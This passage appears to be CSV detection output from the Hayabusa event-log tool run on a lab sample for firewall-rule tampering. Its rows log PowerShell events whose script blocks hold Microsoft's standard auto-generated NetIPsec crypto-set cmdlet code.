($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { 
$__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeCryptoSet' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.277 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.277 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.280 
+09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.281 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.282 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.285 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" 
ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.286 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.286 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.329 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEQMCryptoSet' 
$script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, 
[Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { 
[object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} 
} else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecQuickModeCryptoSet' -Alias '*' function Get-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')]",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.329 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = 
$MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEQMCryptoSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, 
[Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent 
= $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 
'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 
'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecQuickModeCryptoSet' -Alias '*' function Get-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] 